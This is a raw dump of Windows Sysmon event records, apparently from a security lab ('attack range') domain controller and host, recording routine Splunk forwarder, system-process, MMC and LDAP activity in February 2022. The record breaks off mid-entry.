10341000x8000000000000000286005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.989{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0F50-6216-CB04-000000003802}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.989{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F50-6216-CB04-000000003802}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.990{C8EA50B7-0F50-6216-CB04-000000003802}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.739{C8EA50B7-0F50-6216-CA04-000000003802}26524268C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F9031FC8D1D5A3A11CE7C818619E65C,SHA256=5F08ED7E882994FC790483846D2F4F0A83B2D855FFE69B1E91B49A246871FB8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.536{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\SchCache\win-dc-tcontreras-attack-range-173.attackrange.local.schMD5=3B3531A335298119AD90D9B9BEB810AF,SHA256=77996876B4230A7DFCE13A77C0AA2E3B969AFA2A4562FD8583B6DDE3742EB2AD,IMPHASH=00000000000000000000000000000000falsetrue 734700x8000000000000000285999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.505{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\System32\mmc.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x8000000000000000285998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F50-6216-CA04-000000003802}2652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB8C2E12FC1EA500817255F8D46EBA3D,SHA256=02EDE26E4508D15B789D32103E6A3423F973EF1EC55EAF695D74CA0F9CECF936,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA32A318F037709C904AA7046ED21982,SHA256=EA6547282DF53309F804817F74694B42BB88EF83159D7F9C0D76D45FD1C326A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0F50-6216-CA04-000000003802}2652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.489{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F50-6216-CA04-000000003802}2652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.492{C8EA50B7-0F50-6216-CA04-000000003802}2652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:20.302{C8EA50B7-0F4F-6216-C904-000000003802}5788224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:21.602{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919C426E9ABF40B713A01997BC3D927B,SHA256=4FB23A0872178669D7CB5F60C43376C25780FCE414611238D2AC611F1692B90F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.971{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53292-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.971{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\System32\mmc.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53292-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:21.520{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9287D73AC9900A06D2CC391E4EA463A4,SHA256=B4381662983494C6DA4F6E24981122F38AAEC11244B74DA89525A0A15DE32A59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:21.505{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB8C2E12FC1EA500817255F8D46EBA3D,SHA256=02EDE26E4508D15B789D32103E6A3423F973EF1EC55EAF695D74CA0F9CECF936,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:20.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51228-false10.0.1.12-8000- 23542300x8000000000000000215003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:22.617{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF0DE2276842ED0AFB417B66CA97B3D1,SHA256=08191DA0B5CC28ADA7D1B220E50FD89EDDBDCF96F36BECC850DE2ABE33B7D9AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:22.536{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10E31DDAAE09E9745A5C19D629CD9CA5,SHA256=1E5FDD422D5C3E742657E18FE3ABEC8D872239D7C720871594099B1891419597,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000286015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:19.988{C8EA50B7-0F2D-6216-C404-000000003802}1164win-dc-tcontreras-attack-range-173.attackrange.local0fe80::dc9d:9662:799b:139c;::ffff:10.0.1.14;C:\Windows\System32\mmc.exe 23542300x8000000000000000286049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=897F2396A484C034BB434A69F2B0AEDB,SHA256=12855AB6279EB3A71A3ECAAEE0D739C496F02FB39BBC4450BC0DC3E114E0D8C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:23.758{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A92B283F8CBA330DC3B66515404BFF6,SHA256=A4249544F2FB84C1FC5951C0EDA8B81AB4E5DA7CA7F11369AA666F52FEECF8D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF5414A5A5288221CD80E3AD00163692,SHA256=690ACB681524725906D8F7B40585A10E01BF3748DECA42949AFEE6E748EACE7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+535ce|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68d3c|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68d3c|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698|C:\Windows\System32\mshtml.dll+113e1c|C:\Windows\System32\mshtml.dll+113777 10341000x8000000000000000286045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68d3c|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158 10341000x8000000000000000286044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68d3c|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.067{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+1c0e5|C:\Windows\System32\SHELL32.dll+53538|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+68cdc|C:\Windows\System32\ieframe.dll+68be4|C:\Windows\System32\ieframe.dll+68827|C:\Windows\System32\ieframe.dll+6874c|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.d